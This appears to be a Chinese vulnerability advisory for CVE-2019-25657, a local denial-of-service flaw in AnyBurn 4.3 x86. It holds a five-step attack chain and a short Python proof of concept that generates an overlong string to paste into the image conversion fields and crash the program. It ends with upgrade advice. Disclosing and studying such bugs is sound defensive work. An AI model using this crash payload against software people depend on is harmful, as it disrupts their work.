CVE-2019-25657 CVSS 5.5 中危

CVE-2019-25657 AnyBurn拒绝服务漏洞

披露日期: 2026-04-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2019-25657

漏洞类型

拒绝服务

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

AnyBurn

漏洞概述

AnyBurn 4.3 x86版本存在安全漏洞，属于拒绝服务漏洞。由于软件未对输入长度进行严格限制，本地攻击者可以通过向镜像转换功能提供超长字符串来触发该漏洞。具体攻击方式是在源或目标镜像文件字段中粘贴大量缓冲区数据，然后点击“立即转换”按钮，导致应用程序崩溃，从而造成拒绝服务，影响系统可用性。

技术细节

该漏洞的原理是典型的缓冲区溢出导致程序崩溃。在AnyBurn 4.3 x86版本中，镜像转换功能在处理文件路径输入时，缺乏有效的边界检查机制。攻击者利用这一缺陷，可以构造包含数千个重复字符（如“A”）的恶意字符串。当该字符串被粘贴到输入框并触发转换操作时，程序试图分配或读取超出预期长度的内存区域，导致栈溢出或内存访问违例。根据CVSS向量分析，该漏洞的攻击向量为本地（AV:L），且需要用户交互（UI:R），虽然利用复杂度低，但仅影响应用程序的可用性（A:H），对数据的机密性和完整性无直接破坏。

攻击链分析

STEP 1

1. 侦察阶段

攻击者确认目标系统上安装了AnyBurn 4.3 x86版本软件。

STEP 2

2. 构造载荷

攻击者编写简单的脚本或工具，生成包含大量填充字符（如5000个'A'）的恶意字符串。

STEP 3

3. 实施攻击

攻击者在本地打开AnyBurn程序，进入镜像转换界面，将生成的恶意字符串粘贴到文件路径输入框中。

STEP 4

4. 触发漏洞

攻击者点击“立即转换”按钮，程序尝试处理超长输入，触发缓冲区溢出。

STEP 5

5. 达成效果

AnyBurn应用程序发生异常崩溃，导致服务不可用，实现拒绝服务攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2019-25657
# This script generates a payload to crash AnyBurn 4.3 x86

def generate_crash_payload():
    # Create a large string (buffer) to trigger the overflow
    # 5000 characters is usually sufficient to crash the vulnerable function
    payload = "A" * 5000
    return payload

if __name__ == "__main__":
    print("[+] CVE-2019-25657 AnyBurn Denial of Service PoC")
    print("[+] Payload generated below.")
    print("[+] Steps to reproduce:")
    print("1. Open AnyBurn 4.3 x86")
    print("2. Go to the image conversion function")
    print("3. Paste the following string into the 'Source' or 'Destination' field")
    print("4. Click 'Convert Now'")
    print("5. The application should crash.")
    print("-" * 20)
    print(generate_crash_payload())

影响范围

AnyBurn 4.3 x86

防御指南

临时缓解措施

建议用户尽快访问软件官方网站下载并安装AnyBurn的最新修复版本以彻底解决该漏洞。在未完成升级前，用户应避免在处理镜像文件时输入超长字符串，或在不信任的环境下运行该软件，以防止应用程序意外崩溃造成数据丢失或工作中断。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表